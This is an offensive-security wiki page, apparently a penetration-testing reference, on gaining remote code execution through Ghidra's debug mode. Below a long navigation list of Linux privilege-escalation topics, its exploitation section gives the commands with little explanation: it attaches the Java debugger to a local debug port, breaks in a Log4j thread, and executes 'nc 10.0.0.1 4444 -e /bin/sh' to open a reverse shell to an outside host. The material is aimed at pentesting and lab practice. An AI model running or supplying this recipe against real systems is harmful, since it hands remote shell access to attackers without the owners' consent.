OFFSEC Wiki

Exploits related to Linux

Privilege Escalation

Ansible Playbook Privilege Escalation
Apache Conf Privilege Escalation
Bash eq Privilege Escalation
Buffer Overflow Privilege Escalation
Chrome Remote Debugger Pentesting
Doas Privilege Escalation
Ghidra Debug Mode RCE
Gnuplot Privilege Escalation
LXC/LXD (Linux Container/Daemon) Privilege Escalation
Linux Privilege Escalation
Mozilla Pentesting
OpenSSL Privilege Escalation
Pip Download Code Execution
PolKit Privilege Escalation
Python Eval Code Execution
Python Jails Escape
Python Privilege Escalation
Python Yaml Privilege Escalation
Ruby Privilege Escalation
Rust Privilege Escalation
SSSD Privilege Escalation
Shared Library Hijacking
Snapd Privilege Escalation
Sudo ClamAV Privilege Escalation
Sudo Dstat Privilege Escalation
Sudo Exiftool Privilege Escalation
Sudo Fail2ban Privilege Escalation
Sudo Git Privilege Escalation
Sudo Java Privilege Escalation
Sudo OpenVPN Privilege Escalation
Sudo Path Traversal Privilege Escalation
Sudo Privilege Escalation
Sudo Privilege Escalation by Overriding Shared Library
Sudo Reboot Privilege Escalation
Sudo Screen Privilege Escalation
Sudo Service Privilege Escalation
Sudo Shutdown, Poweroff Privilege Escalation
Sudo Systemctl Privilege Escalation
Sudo Tee Privilege Escalation
Sudo Umount Privilege Escalation
Sudo Vim Privilege Escalation
Sudo Wall Privilege Escalation
Sudo Wget Privilege Escalation
Sudoedit Privilege Escalation
Tar Wildcard Injection PrivEsc
Update-Motd Privilege Escalation
irb (Interactive Ruby Shell) Privilege Escalation

Post Exploitation

Linux Backdoors
Linux Pivoting

Backup

BorgBackup Pentesting

Container

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Archive

7z
Bzip2 & Bunzip2
Crack Zip Password
Gzip & Gunzip
Tar
Zip & Unzip

Attack

Fork Bomb

Others

Linux Techniques
Linux Troubleshooting
Linux User & File Management
X11 (X Window System) Pentesting

Ghidra Debug Mode RCE

Last modified: 2023-03-30

Linux Privilege Escalation

Exploitation

jdb -attach 127.0.0.1:18001
> classpath
> classes
Log4j2-TF-4-Scheduled-1[1] stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc 10.0.0.1 4444 -e /bin/sh")

References

  • https://www.youtube.com/watch?v=N3VcWIUpgfE
  • https://github.com/NationalSecurityAgency/ghidra/issues/6

Tools by Muhammd

RedTeam Repos

Automatic PenTest Scripts

AutoRecon

Auto reconnaissance CLI.

PenTest Tools

PenTest Tools

Disclaimer Privacy Policy
GitHub Twitter